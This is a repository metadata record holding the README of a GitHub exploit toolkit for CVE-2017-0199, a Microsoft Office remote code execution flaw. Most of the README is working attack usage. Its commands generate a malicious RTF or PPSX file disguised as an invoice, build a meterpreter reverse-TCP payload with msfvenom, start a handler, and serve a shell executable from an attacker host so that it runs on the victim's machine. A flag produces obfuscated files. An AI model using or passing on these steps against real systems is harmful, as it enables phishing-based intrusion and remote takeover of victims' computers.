{"id":37115532,"url":"https://github.com/bhdresh/cve-2017-0199","last_synced_at":"2026-01-14T13:33:46.358Z","repository":{"id":38420448,"uuid":"88486475","full_name":"bhdresh/CVE-2017-0199","owner":"bhdresh","description":"Exploit toolkit CVE-2017-0199 - v4.0 is a handy python script which provides pentesters and security researchers a quick and effective way to test Microsoft Office RCE. It could generate a malicious RTF/PPSX file and deliver metasploit / meterpreter / other payload to victim without any complex configuration.","archived":false,"fork":false,"pushed_at":"2017-11-19T11:01:16.000Z","size":287,"stargazers_count":726,"open_issues_count":14,"forks_count":262,"subscribers_count":45,"default_branch":"master","last_synced_at":"2025-06-05T11:34:24.852Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/bhdresh.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2017-04-17T08:10:07.000Z","updated_at":"2025-05-30T02:11:07.000Z","dependencies_parsed_at":"2022-07-20T12:48:54.229Z","dependency_job_id":null,"html_url":"https://github.com/bhdresh/CVE-2017-0199","commit_stats":null,"previous_names":[],"tags_count":8,"template":false,"template_full_name":null,"purl":"pkg:github/bhdresh/CVE-2017-0199","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/bhdresh%2FCVE-2017-0199","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/bhdresh%2FCVE-2017-0199/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/bhdresh%2FCVE-2017-0199/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/bhdresh%2FCVE-2017-0199/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/bhdresh","download_url":"https://codeload.github.com/bhdresh/CVE-2017-0199/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/bhdresh%2FCVE-2017-0199/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":28421255,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-01-14T13:30:50.153Z","status":"ssl_error","status_checked_at":"2026-01-14T13:29:08.907Z","response_time":107,"last_error":"SSL_connect returned=1 errno=0 peeraddr=140.82.121.5:443 state=error: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2026-01-14T13:33:45.648Z","updated_at":"2026-01-14T13:33:46.344Z","avatar_url":"https://github.com/bhdresh.png","language":"Python","funding_links":[],"categories":[],"sub_categories":[],"readme":"## Exploit toolkit CVE-2017-0199 - v4.0\n\nExploit toolkit CVE-2017-0199 - v4.0 is a handy python script which provides pentesters and security researchers a quick and effective way to test Microsoft Office RCE. It could generate a malicious RTF/PPSX file and deliver metasploit / meterpreter / other payload to victim without any complex configuration. \n\n### Disclaimer\n\nThis program is for Educational purpose ONLY. Do not use it without permission. The usual disclaimer applies, especially the fact that me (bhdresh) is not liable for any damages caused by direct or indirect use of the information or functionality provided by these programs. The author or any Internet provider bears NO responsibility for content or misuse of these programs or any derivatives thereof. By using this program you accept the fact that any damage (dataloss, system crash, system compromise, etc.) caused by the use of these programs is not bhdresh's responsibility.\n\nFinally, this is a personal development, please respect its philosophy and don't use it for bad things!\n\n### Licence\nCC BY 4.0 licence - https://creativecommons.org/licenses/by/4.0/\n\n### Release note:\n\nIntroduced following capabilities to the script\n\n\t- Generate Malicious PPSX file\n\t- Exploitation mode for generated PPSX file\n\t- Updated template.ppsx\n\nVersion: Python version 2.7.13\n\n### Scenario 1: Deliver local payload\n###### Example commands\n\t1) Generate malicious RTF file\n\t   # python cve-2017-0199_toolkit.py -M gen -t RTF -w Invoice.rtf -u http://192.168.56.1/logo.doc\n\t2) (Optional, if using MSF Payload) : Generate metasploit payload and start handler\n\t   # msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=4444 -f exe \u003e /tmp/shell.exe\n\t   # msfconsole -x \"use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.56.1; run\"\n\t3) Start toolkit in exploit mode to deliver local payload\n\t   # python cve-2017-0199_toolkit.py -M exp -t RTF -e http://192.168.56.1/shell.exe -l /tmp/shell.exe\n###### Sequence diagram\n\n![alt tag](https://raw.githubusercontent.com/bhdresh/CVE-2017-0199/v3.0-beta-2.0/Scenario1.jpg)\n\n\n### Scenario 2: Deliver Remote payload\n###### Example commands\n\t1) Generate malicious RTF file\n\t   # python cve-2017-0199_toolkit.py -M gen -t RTF -w Invoice.rtf -u http://192.168.56.1/logo.doc\n\t2) Start toolkit in exploit mode to deliver remote payload\n\t   # python cve-2017-0199_toolkit.py -M exp -t RTF -e http://remoteserver.com/shell.exe\n###### Sequence diagram\n\n![alt tag](https://raw.githubusercontent.com/bhdresh/CVE-2017-0199/v3.0-beta-2.0/Scenario2.jpg)\n\n\n### Scenario 3: Deliver custom HTA file\n###### Example commands\n\t1) Generate malicious RTF file\n\t   # python cve-2017-0199_toolkit.py -M gen -t RTF -w Invoice.rtf -u http://192.168.56.1/logo.doc -x 1\n\t2) Start toolkit in exploit mode to deliver custom HTA file\n\t   # python cve-2017-0199_toolkit.py -M exp -t RTF -H /tmp/custom.hta\n###### Sequence diagram\n\n![alt tag](https://raw.githubusercontent.com/bhdresh/CVE-2017-0199/v3.0-beta-2.0/Scenario3.jpg)\n\n\n### Command line arguments:\n\n    # python cve-2017-0199_toolkit.py -h\n\n    This is a handy toolkit to exploit CVE-2017-0199 (Microsoft office RCE)\n\n    Modes:\n\n    -M gen                                          Generate Malicious file only\n\n         Generate malicious RTF/PPSX file:\n\n          -w \u003cFilename.rtf/Filename.ppsx\u003e     Name of malicious RTF/PPSX file (Share this file with victim).\n\n          -u \u003chttp://attacker.com/test.hta\u003e   The path to an HTA/SCT file. Normally, this should be a domain or IP where        this                                          tool is running.\n\t                                      For example, http://attackerip.com/test.doc (This URL will be included in \t                                              malicious RTF/PPSX file and will be requested once victim will open malicious RTF file.\n\t      -t RTF|PPSX (default = RTF)         Type of the file to be generated.\n          -x 0|1  (default = 0)               Generate obfuscated RTF file. 0 = Disable, 1 = Enable.\n\n\t\t\t\t\t      \n    -M exp                                          Start exploitation mode\n\n         Exploitation:\n\t \n\t      -t RTF|PPSX (default = RTF)         Type of file to be exolited.\n          -H \u003c/tmp/custom\u003e                Local path of a custom HTA/SCT file which needs to be delivered and executed on target.\n\t                                          NOTE: This option will not deliver payloads specified through options \"-e\" and \"-l\"\n\t\t\t\t\t\t  \n          -p \u003cTCP port:Default 80\u003e            Local port number.\n\n          -e \u003chttp://attacker.com/shell.exe\u003e  The path of an executable file / meterpreter shell / payload  which needs to be executed on target.\n\n          -l \u003c/tmp/shell.exe\u003e                 If payload is hosted locally, specify local path of an executable file / meterpreter shell / payload.\n\n\n### Credit\n\n@nixawk for RTF sample, @Li Haifei, @bhdresh\n\n### Bug, issues, feature requests\n\nObviously, I am not a fulltime developer so expect some hiccups\n\nPlease report bugs, issues through https://github.com/bhdresh/CVE-2017-0199/issues/new\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fbhdresh%2Fcve-2017-0199","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fbhdresh%2Fcve-2017-0199","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fbhdresh%2Fcve-2017-0199/lists"}